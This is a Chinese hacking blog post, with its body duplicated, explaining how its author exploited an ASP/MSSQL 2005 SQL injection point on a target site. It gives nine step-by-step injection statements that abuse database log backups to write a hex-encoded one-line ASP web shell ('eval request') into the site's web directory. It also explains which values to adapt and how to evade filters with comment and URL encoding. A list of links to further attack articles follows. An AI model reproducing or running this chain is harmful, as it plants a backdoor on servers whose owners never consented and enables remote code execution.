mssql2005 DB權(quán)限導(dǎo)出一句話
發(fā)布時間:2012-06-17 23:40:22 作者:佚名
我要評論

昨晚在拿站過程中遇到了個ASP+MSSQL2005的注入點(diǎn),權(quán)限是DB_Owner的權(quán)限
網(wǎng)站路徑也搞到了,本想使用差異備份,在數(shù)據(jù)庫日志中插入一句話,然后備份到網(wǎng)站目錄下拿shell的,估計(jì)是用戶沒有備份數(shù)據(jù)庫的權(quán)限,但使用MSSQL2000的備份方法根本行不通,后來才想到MSSQL2005的備份和MSSQL2000有點(diǎn)不同。
后來在網(wǎng)上搜半天沒有找到具體的備份語句,后來在群求助,小冰才發(fā)我了具體的利用語句,但貼出來的文章貌似沒啥水準(zhǔn),大家都知道手工差異備份是自己需要修改數(shù)據(jù)庫名和網(wǎng)站路徑的,但那個文章中對語句沒有做任何解釋,無奈之下我只好自己嘗試了,雖然測試的網(wǎng)站沒有成功拿下shell,單語句是沒有錯誤的,我在本地的MSSQL2005的查詢分析器中測試通過了,再次特將語句整理出來分享個大家,并做好詳細(xì)的解釋說明,首先來貼出語句。
第一步
;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full--
第二步:
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
第三步
;drop/**/table/**/[itpro]--
第四步
;create/**/table/**/[itpro]([a]/**/image)--
第五步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
第六步
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--
第七步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
第八步
;drop/**/table/**/[itpro]--
第九步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
其中紅色的“Hospital”既是數(shù)據(jù)庫名,這個要根據(jù)自己的情況來修改,然后黃色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句話“<%eval request("a")%>”的內(nèi)容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”為備份的路徑“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是刪除itpro的表,如果第一次的話這個表是不存在的,就會提示無權(quán)限的信息。另外在語句“disk=@d”的地方可以將“=”更換成“%3D”,就是使用URL編碼。“/**/”就等于空格了,這個大家在學(xué)習(xí)注入的過程中應(yīng)該了解,也可以更換成“%20”。
后來在網(wǎng)上搜半天沒有找到具體的備份語句,后來在群求助,小冰才發(fā)我了具體的利用語句,但貼出來的文章貌似沒啥水準(zhǔn),大家都知道手工差異備份是自己需要修改數(shù)據(jù)庫名和網(wǎng)站路徑的,但那個文章中對語句沒有做任何解釋,無奈之下我只好自己嘗試了,雖然測試的網(wǎng)站沒有成功拿下shell,單語句是沒有錯誤的,我在本地的MSSQL2005的查詢分析器中測試通過了,再次特將語句整理出來分享個大家,并做好詳細(xì)的解釋說明,首先來貼出語句。
第一步
;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full--
第二步:
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
第三步
;drop/**/table/**/[itpro]--
第四步
;create/**/table/**/[itpro]([a]/**/image)--
第五步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
第六步
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--
第七步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
第八步
;drop/**/table/**/[itpro]--
第九步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
其中紅色的“Hospital”既是數(shù)據(jù)庫名,這個要根據(jù)自己的情況來修改,然后黃色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句話“<%eval request("a")%>”的內(nèi)容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”為備份的路徑“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是刪除itpro的表,如果第一次的話這個表是不存在的,就會提示無權(quán)限的信息。另外在語句“disk=@d”的地方可以將“=”更換成“%3D”,就是使用URL編碼。“/**/”就等于空格了,這個大家在學(xué)習(xí)注入的過程中應(yīng)該了解,也可以更換成“%20”。
相關(guān)文章
thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決
本文來介紹一下thinkphp官方修復(fù)的一個getshell漏洞,框架對控制器沒有進(jìn)行足夠的檢測導(dǎo)致的一處getshell,小編覺得挺不錯的,現(xiàn)在分享給大家,也給大家做個參考。一起跟隨2018-12-12記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊,需要的朋友可以參考下2018-11-30- 這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下2017-09-06
- 這篇文章主要為大家介紹了基于反射的XSS攻擊,主要依靠站點(diǎn)服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下2017-05-20
- 這篇文章主要介紹了SQL注入黑客防線網(wǎng)站實(shí)例分析,需要的朋友可以參考下2017-05-19
ASP+PHP 標(biāo)準(zhǔn)sql注入語句(完整版)
這里為大家分享一下sql注入的一些語句,很多情況下由于程序員的安全意識薄弱或基本功不足就容易導(dǎo)致sql注入安全問題,建議大家多看一下網(wǎng)上的安全文章,最好的防范就是先學(xué)2017-05-19- 對于目前流行的sql注入,程序員在編寫程序時,都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會自動的記錄下你的IP地址,提交的非法參數(shù)和動作等,2017-04-29
XSS繞過技術(shù) XSS插入繞過一些方式總結(jié)
我們友情進(jìn)行XSS檢查,偶然跳出個小彈窗,其中我們總結(jié)了一些平時可能用到的XSS插入方式,方便我們以后進(jìn)行快速檢查,也提供了一定的思路,其中XSS有反射、存儲、DOM這三類2016-12-27- 這篇文章主要介紹了Python 爬蟲使用動態(tài)切換ip防止封殺的相關(guān)資料,需要的朋友可以參考下2016-10-08
- 這篇文章主要介紹了使用爬蟲采集網(wǎng)站時,解決被封IP的幾種方法的相關(guān)資料,需要的朋友可以參考下2016-10-08